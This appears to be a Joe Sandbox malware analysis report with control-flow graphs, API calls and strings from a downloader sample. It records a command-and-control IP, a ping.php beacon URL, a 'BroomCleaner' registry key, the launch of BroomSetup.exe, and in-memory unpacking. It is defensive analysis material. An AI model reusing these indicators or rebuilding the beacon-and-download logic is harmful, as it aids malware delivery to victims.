                                                                                                                                                                                                                                              control_flow_graph 750 426504-427062 call 4275a4 call 403491 * 15 call 40197c call 403491 * 14 call 40197c call 403491 * 17 call 40197c call 403491 * 7 call 40197c call 403491 * 2 call 40197c call 403491 * 2 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 401b1e call 401a67 call 401aa1 call 403491 * 9 call 40197c call 401aa1 * 2 call 403491 * 6 call 40197c call 401aa1 call 401a67 call 401aa1 * 2 call 403491 * 12 call 40197c call 401aa1 call 403491 * 61 call 40197c call 401aa1 call 403491 * 55 call 40197c call 401aa1 * 2 1223 427068-42706b 750->1223 1224 42717c-42719d call 401aa1 WSAStartup 750->1224 1223->1224 1225 427071-427177 call 403491 * 16 call 40197c call 401aa1 call 403ae1 SetThreadLocale call 401ae8 call 401aa1 1223->1225 1229 4271a3-4271b9 socket 1224->1229 1230 427571 1224->1230 1225->1224 1232 4271d0-4271e3 call 401a67 gethostbyname 1229->1232 1233 4271bb-4271cb call 40ff7e WSACleanup 1229->1233 1235 427574-42757d call 40ff7e 1230->1235 1232->1235 1245 4271e9-427225 call 40aaa0 htons connect 1232->1245 1244 42758b-4275a3 call 401ae8 1233->1244 1247 42757e-427585 WSACleanup closesocket 1235->1247 1245->1235 1254 42722b-427247 call 403da5 call 401a67 send 1245->1254 1247->1244 1254->1235 1265 42724d-427251 1254->1265 1266 427253-427263 send 1265->1266 1267 427269-42728d call 40b5a0 1265->1267 1266->1235 1266->1267 1273 42728f-4272a3 recv 1267->1273 1273->1235 1275 4272a9-4272ae 1273->1275 1277 4273b6-4273bf 1275->1277 1278 4272b4-4272bc 1275->1278 1277->1235 1280 4273c5-4273c8 1277->1280 1278->1277 1281 4272c2-4272ca 1278->1281 1280->1273 1281->1277 1283 4272d0-4272db 1281->1283 1285 427300-427309 1283->1285 1286 4272dd-4272f2 call 412faf 1283->1286 1290 42730c-427311 1285->1290 1286->1235 1296 4272f8-4272fb 1286->1296 1290->1290 1293 427313-427315 1290->1293 1294 42731b-427330 call 403a0c 1293->1294 1295 4273cd-4273d2 1293->1295 1301 4273ad-4273b3 1294->1301 1311 427332-427352 call 412faf 1294->1311 1299 4273d4-4273d8 1295->1299 1300 4273df-4273e3 1295->1300 1296->1301 1304 4273da 1299->1304 1305 4273e9-427405 call 426127 1299->1305 1300->1305 1306 427515-427517 1300->1306 1301->1277 1304->1235 1322 427408-42740a 1305->1322 1309 42755b-427568 call 426127 1306->1309 1310 427519-427532 call 426127 1306->1310 1327 42756a-42756f 1309->1327 1324 427535-427548 recv 1310->1324 1325 427376-42738e call 412faf 1311->1325 1326 427354-42736e call 41196d 1311->1326 1328 42740d-427421 recv 1322->1328 1324->1235 1330 42754a-427557 1324->1330 1325->1301 1342 427390-4273aa call 412faf 1325->1342 1326->1235 1341 427374 1326->1341 1327->1247 1328->1235 1333 427427-42742c 1328->1333 1330->1324 1335 427559 1330->1335 1338 427432-427437 1333->1338 1339 4274fb-427502 1333->1339 1335->1327 1338->1339 1343 42743d-427442 1338->1343 1339->1328 1344 427508 1339->1344 1341->1301 1342->1301 1343->1339 1347 427448-427469 call 41196d 1343->1347 1344->1235 1347->1235 1353 42746f-427471 1347->1353 1353->1235 1355 427477 1353->1355 1357 42750a-427513 1355->1357 1358 42747d-427489 1355->1358 1357->1327 1360 4274a5-4274a7 1358->1360 1361 42748b-4274a2 call 42611d 1358->1361 1363 4274aa-4274c0 recv 1360->1363 1361->1360 1363->1235 1365 4274c6-4274d3 1363->1365 1365->1363 1366 4274d5-4274e7 recv 1365->1366 1366->1235 1367 4274ed-4274f6 1366->1367 1367->1322
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00426509
                                                                                                                                                                                                                                              • SetThreadLocale.KERNEL32(00000000,0043CF38,?,185.172.128.90,00000000), ref: 0042715F
                                                                                                                                                                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 00427195
                                                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 004271AB
                                                                                                                                                                                                                                              • WSACleanup.WS2_32 ref: 004271C5
                                                                                                                                                                                                                                              • gethostbyname.WS2_32(00000000), ref: 004271D9
                                                                                                                                                                                                                                              • htons.WS2_32(?), ref: 0042720B
                                                                                                                                                                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 0042721C
                                                                                                                                                                                                                                              • send.WS2_32(00000000,00000000,00000000,00000000), ref: 0042723F
                                                                                                                                                                                                                                              • send.WS2_32(00000000,00000000,?,00000000), ref: 0042725B
                                                                                                                                                                                                                                              • recv.WS2_32(00000000,00000000,00000001,00000000), ref: 0042729B
                                                                                                                                                                                                                                              • recv.WS2_32(?,00000000,00000001,00000000), ref: 00427419
                                                                                                                                                                                                                                              • recv.WS2_32(?,?,00000000,00000000), ref: 004274B8
                                                                                                                                                                                                                                              • recv.WS2_32(?,0000000A,00000002,00000000), ref: 004274DF
                                                                                                                                                                                                                                              • recv.WS2_32(00000000,?,?,00000000), ref: 00427540
                                                                                                                                                                                                                                              • WSACleanup.WS2_32 ref: 0042757E
                                                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 00427585
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: recv$Cleanupsend$H_prologLocaleStartupThreadclosesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                              • String ID: HTTP/1.1$185.172.128.90$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
                                                                                                                                                                                                                                              • API String ID: 1963173973-3676584321
                                                                                                                                                                                                                                              • Opcode ID: 51c48334816e60799d07e569962aedb61f2267285f835a8626d5efbc9b1ad91a
                                                                                                                                                                                                                                              • Instruction ID: 5d172c2dbe9bbe0c33395fe13eab479c6144de839071dc58773496d8017457fc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51c48334816e60799d07e569962aedb61f2267285f835a8626d5efbc9b1ad91a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F092661090A2A19ACB02FFB5689649E7FF55A1630DB14747FE5907F3D3CA2C8209C76E
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1695 4139e7-4139f3 call 4177fa 1698 413a15-413a21 call 413a6c ExitProcess 1695->1698 1699 4139f5-413a03 GetPEB 1695->1699 1699->1698 1700 413a05-413a0f GetCurrentProcess TerminateProcess 1699->1700 1700->1698
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00413A21
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                              • Opcode ID: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
                                                                                                                                                                                                                                              • Instruction ID: 5487a5d46cc6b628b64d0aabb319d5eb223523a794a7473b7ec3082598feaf8f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2E04F31101504ABCF116F14DD08A9A3B29FF04386F454029F84656131CF39DE83CA48
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1740 43ad8ce-43ad8e7 1741 43ad8e9-43ad8eb 1740->1741 1742 43ad8ed 1741->1742 1743 43ad8f2-43ad8fe CreateToolhelp32Snapshot 1741->1743 1742->1743 1744 43ad90e-43ad91b Module32First 1743->1744 1745 43ad900-43ad906 1743->1745 1746 43ad91d-43ad91e call 43ad58d 1744->1746 1747 43ad924-43ad92c 1744->1747 1745->1744 1751 43ad908-43ad90c 1745->1751 1752 43ad923 1746->1752 1751->1741 1751->1744 1752->1747
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 043AD8F6
                                                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 043AD916
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558366239.00000000043AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 043AD000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_43ad000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                              • Instruction ID: 8520555cad887eb3cdf6967193df9b76921b12ceab778541ab1f412e13652efb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1F0F6361403146FE7203BF5B88CBAE72EDEF48728F101529E642D18C0CB70F8454A61
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1368 41a36b-41a39b call 41a0ce 1371 41a3b6-41a3c2 call 41e7d7 1368->1371 1372 41a39d-41a3a8 call 41236e 1368->1372 1378 41a3c4-41a3d9 call 41236e call 412381 1371->1378 1379 41a3db-41a424 call 41a039 1371->1379 1377 41a3aa-41a3b1 call 412381 1372->1377 1389 41a68d-41a693 1377->1389 1378->1377 1387 41a491-41a49a GetFileType 1379->1387 1388 41a426-41a42f 1379->1388 1393 41a4e3-41a4e6 1387->1393 1394 41a49c-41a4cd GetLastError call 41234b CloseHandle 1387->1394 1391 41a431-41a435 1388->1391 1392 41a466-41a48c GetLastError call 41234b 1388->1392 1391->1392 1397 41a437-41a464 call 41a039 1391->1397 1392->1377 1395 41a4e8-41a4ed 1393->1395 1396 41a4ef-41a4f5 1393->1396 1394->1377 1405 41a4d3-41a4de call 412381 1394->1405 1401 41a4f9-41a547 call 41e720 1395->1401 1396->1401 1402 41a4f7 1396->1402 1397->1387 1397->1392 1411 41a557-41a57b call 419dec 1401->1411 1412 41a549-41a555 call 41a24a 1401->1412 1402->1401 1405->1377 1417 41a57d 1411->1417 1418 41a58e-41a5d1 1411->1418 1412->1411 1419 41a57f-41a589 call 4163fd 1412->1419 1417->1419 1421 41a5d3-41a5d7 1418->1421 1422 41a5f2-41a600 1418->1422 1419->1389 1421->1422 1424 41a5d9-41a5ed 1421->1424 1425 41a606-41a60a 1422->1425 1426 41a68b 1422->1426 1424->1422 1425->1426 1427 41a60c-41a63f CloseHandle call 41a039 1425->1427 1426->1389 1430 41a641-41a66d GetLastError call 41234b call 41e8e9 1427->1430 1431 41a673-41a687 1427->1431 1430->1431 1431->1426
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0041A039: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041A47F
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0041A486
                                                                                                                                                                                                                                              • GetFileType.KERNEL32(00000000), ref: 0041A492
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041A49C
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0041A4A5
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041A4C5
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0041A60F
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041A641
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0041A648
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                                                                              • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                              • Opcode ID: 0df5222a233c6114ee027709094600eef7ff1df3394e17eab98b892044d57319
                                                                                                                                                                                                                                              • Instruction ID: 1a6929838056931ddf07ca16ed76f5c23edfa2113b557bae9411180e0ac2dad7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0df5222a233c6114ee027709094600eef7ff1df3394e17eab98b892044d57319
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAA13632A041188FDF19DF68D8517EE7BA1AF06324F14015EEC51EB391DB398DA2CB5A
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1436 4192ad-4192bd 1437 4192d7-4192d9 1436->1437 1438 4192bf-4192d2 call 41236e call 412381 1436->1438 1440 419641-41964e call 41236e call 412381 1437->1440 1441 4192df-4192e5 1437->1441 1454 419659 1438->1454 1460 419654 call 410905 1440->1460 1441->1440 1444 4192eb-419316 1441->1444 1444->1440 1447 41931c-419325 1444->1447 1450 419327-41933a call 41236e call 412381 1447->1450 1451 41933f-419341 1447->1451 1450->1460 1452 419347-41934b 1451->1452 1453 41963d-41963f 1451->1453 1452->1453 1458 419351-419355 1452->1458 1459 41965c-419661 1453->1459 1454->1459 1458->1450 1462 419357-41936e 1458->1462 1460->1454 1465 419370-419373 1462->1465 1466 41938b-419394 1462->1466 1467 419375-41937b 1465->1467 1468 41937d-419386 1465->1468 1469 4193b2-4193bc 1466->1469 1470 419396-4193ad call 41236e call 412381 call 410905 1466->1470 1467->1468 1467->1470 1473 419427-419441 1468->1473 1471 4193c3-4193e1 call 417a45 call 41629a * 2 1469->1471 1472 4193be-4193c0 1469->1472 1498 419574 1470->1498 1507 4193e3-4193f9 call 412381 call 41236e 1471->1507 1508 4193fe-419424 call 419800 1471->1508 1472->1471 1475 419515-41951e call 421229 1473->1475 1476 419447-419457 1473->1476 1487 419591 1475->1487 1488 419520-419532 1475->1488 1476->1475 1479 41945d-41945f 1476->1479 1479->1475 1483 419465-41948b 1479->1483 1483->1475 1490 419491-4194a4 1483->1490 1496 419595-4195ad ReadFile 1487->1496 1488->1487 1492 419534-419543 GetConsoleMode 1488->1492 1490->1475 1494 4194a6-4194a8 1490->1494 1492->1487 1497 419545-419549 1492->1497 1494->1475 1499 4194aa-4194d5 1494->1499 1501 419609-419614 GetLastError 1496->1501 1502 4195af-4195b5 1496->1502 1497->1496 1504 41954b-419565 ReadConsoleW 1497->1504 1505 419577-419581 call 41629a 1498->1505 1499->1475 1506 4194d7-4194ea 1499->1506 1509 419616-419628 call 412381 call 41236e 1501->1509 1510 41962d-419630 1501->1510 1502->1501 1503 4195b7 1502->1503 1512 4195ba-4195cc 1503->1512 1514 419567 GetLastError 1504->1514 1515 419586-41958f 1504->1515 1505->1459 1506->1475 1519 4194ec-4194ee 1506->1519 1507->1498 1508->1473 1509->1498 1516 419636-419638 1510->1516 1517 41956d-419573 call 41234b 1510->1517 1512->1505 1522 4195ce-4195d2 1512->1522 1514->1517 1515->1512 1516->1505 1517->1498 1519->1475 1526 4194f0-419510 1519->1526 1529 4195d4-4195e4 call 418fc9 1522->1529 1530 4195eb-4195f6 1522->1530 1526->1475 1541 4195e7-4195e9 1529->1541 1535 419602-419607 call 418e09 1530->1535 1536 4195f8 call 419119 1530->1536 1542 4195fd-419600 1535->1542 1536->1542 1541->1505 1542->1541
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 997ea1e074bed25bc4bbba2399cba16e5922d8a4b1bc8de6d13cd7412f5484b7
                                                                                                                                                                                                                                              • Instruction ID: 1de375e9a44cfea9a4e980cda881e291b4907b82d4d6a27c77cd479f01cc8893
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 997ea1e074bed25bc4bbba2399cba16e5922d8a4b1bc8de6d13cd7412f5484b7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCC12B71E04249AFDB11CFA9C851BEE7BB1BF19314F04019AE854B7392C7789D81CB69
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1544 432003c-4320047 1545 4320049 1544->1545 1546 432004c-4320263 call 4320a3f call 4320e0f call 4320d90 VirtualAlloc 1544->1546 1545->1546 1561 4320265-4320289 call 4320a69 1546->1561 1562 432028b-4320292 1546->1562 1567 43202ce-43203c2 VirtualProtect call 4320cce call 4320ce7 1561->1567 1564 43202a1-43202b0 1562->1564 1566 43202b2-43202cc 1564->1566 1564->1567 1566->1564 1573 43203d1-43203e0 1567->1573 1574 43203e2-4320437 call 4320ce7 1573->1574 1575 4320439-43204b8 VirtualFree 1573->1575 1574->1573 1577 43205f4-43205fe 1575->1577 1578 43204be-43204cd 1575->1578 1581 4320604-432060d 1577->1581 1582 432077f-4320789 1577->1582 1580 43204d3-43204dd 1578->1580 1580->1577 1586 43204e3-4320505 LoadLibraryA 1580->1586 1581->1582 1587 4320613-4320637 1581->1587 1584 43207a6-43207b0 1582->1584 1585 432078b-43207a3 1582->1585 1588 43207b6-43207cb 1584->1588 1589 432086e-43208be LoadLibraryA 1584->1589 1585->1584 1590 4320517-4320520 1586->1590 1591 4320507-4320515 1586->1591 1592 432063e-4320648 1587->1592 1593 43207d2-43207d5 1588->1593 1596 43208c7-43208f9 1589->1596 1594 4320526-4320547 1590->1594 1591->1594 1592->1582 1595 432064e-432065a 1592->1595 1597 43207d7-43207e0 1593->1597 1598 4320824-4320833 1593->1598 1599 432054d-4320550 1594->1599 1595->1582 1600 4320660-432066a 1595->1600 1601 4320902-432091d 1596->1601 1602 43208fb-4320901 1596->1602 1603 43207e2 1597->1603 1604 43207e4-4320822 1597->1604 1608 4320839-432083c 1598->1608 1605 43205e0-43205ef 1599->1605 1606 4320556-432056b 1599->1606 1607 432067a-4320689 1600->1607 1602->1601 1603->1598 1604->1593 1605->1580 1609 432056f-432057a 1606->1609 1610 432056d 1606->1610 1611 4320750-432077a 1607->1611 1612 432068f-43206b2 1607->1612 1608->1589 1613 432083e-4320847 1608->1613 1619 432059b-43205bb 1609->1619 1620 432057c-4320599 1609->1620 1610->1605 1611->1592 1614 43206b4-43206ed 1612->1614 1615 43206ef-43206fc 1612->1615 1616 432084b-432086c 1613->1616 1617 4320849 1613->1617 1614->1615 1621 432074b 1615->1621 1622 43206fe-4320748 1615->1622 1616->1608 1617->1589 1627 43205bd-43205db 1619->1627 1620->1627 1621->1607 1622->1621 1627->1599
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0432024D
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                                              • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                              • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                              • Instruction ID: 8fc00c82f1891b7f5f8bb86eb48b051110fedef5e2ffd93aa1dfb37096590c2f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17526A74A01229DFDB64CF58C984BACBBB5BF09304F1480D9E94DAB351DB30AA89DF14
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1628 42612f-426166 call 4275a4 RegCreateKeyExA 1631 4261f7-4261fb 1628->1631 1632 42616c-42617f 1628->1632 1634 426206-426216 1631->1634 1635 4261fd-426200 RegCloseKey 1631->1635 1633 426182-426187 1632->1633 1633->1633 1636 426189-4261a8 call 402c71 1633->1636 1635->1634 1639 4261ab-4261b0 1636->1639 1639->1639 1640 4261b2-4261ea call 402c71 RegSetValueExA call 402bef 1639->1640 1644 4261ef-4261f2 call 402bef 1640->1644 1644->1631
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00426134
                                                                                                                                                                                                                                              • RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043CE50,SOFTWARE\BroomCleaner), ref: 0042615C
                                                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,?,0043CE50,0043CE51,Installed,Installed), ref: 004261DF
                                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426200
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseCreateH_prologValue
                                                                                                                                                                                                                                              • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                                              • API String ID: 1996196666-529226407
                                                                                                                                                                                                                                              • Opcode ID: 27de81f89804b0a0673715e13edf5a13659c602b223520dd733241f70ea5ab76
                                                                                                                                                                                                                                              • Instruction ID: 58fc235232bf4dd8c125a8bac87f810df134f3da6f2bb4c7cb0ac5f6772b16af
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27de81f89804b0a0673715e13edf5a13659c602b223520dd733241f70ea5ab76
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47319A71A00229AFDF149FA8DC949FEBB79FB48358F44412EE802B7291C7B55E05CB64
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1646 426260-42626f 1647 426271-426277 1646->1647 1647->1647 1648 426279-4262ac ShellExecuteExA 1647->1648 1649 4262c5-4262d1 call 402bef 1648->1649 1650 4262ae-4262bf WaitForSingleObject CloseHandle 1648->1650 1650->1649
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ShellExecuteExA.SHELL32(?,/BroomSetup.exe), ref: 004262A2
                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00008000), ref: 004262B6
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004262BF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                                              • String ID: /BroomSetup.exe
                                                                                                                                                                                                                                              • API String ID: 3837156514-1897133622
                                                                                                                                                                                                                                              • Opcode ID: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                              • Instruction ID: f0609d10c970eb56ece5b35627df0b7ec36997a903e398cb54ca8c4de5c5ad66
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66017C31E00218EBDF25EF69E9459DDBBB8EF08310F41812AF805A6260EB709A45CF94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1653 4163fd-416411 call 41e97a 1656 416413-416415 1653->1656 1657 416417-41641f 1653->1657 1658 416465-416485 call 41e8e9 1656->1658 1659 416421-416428 1657->1659 1660 41642a-41642d 1657->1660 1670 416493 1658->1670 1671 416487-416491 call 41234b 1658->1671 1659->1660 1662 416435-416449 call 41e97a * 2 1659->1662 1663 41644b-41645b call 41e97a FindCloseChangeNotification 1660->1663 1664 41642f-416433 1660->1664 1662->1656 1662->1663 1663->1656 1673 41645d-416463 GetLastError 1663->1673 1664->1662 1664->1663 1675 416495-416498 1670->1675 1671->1675 1673->1658
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 00416453
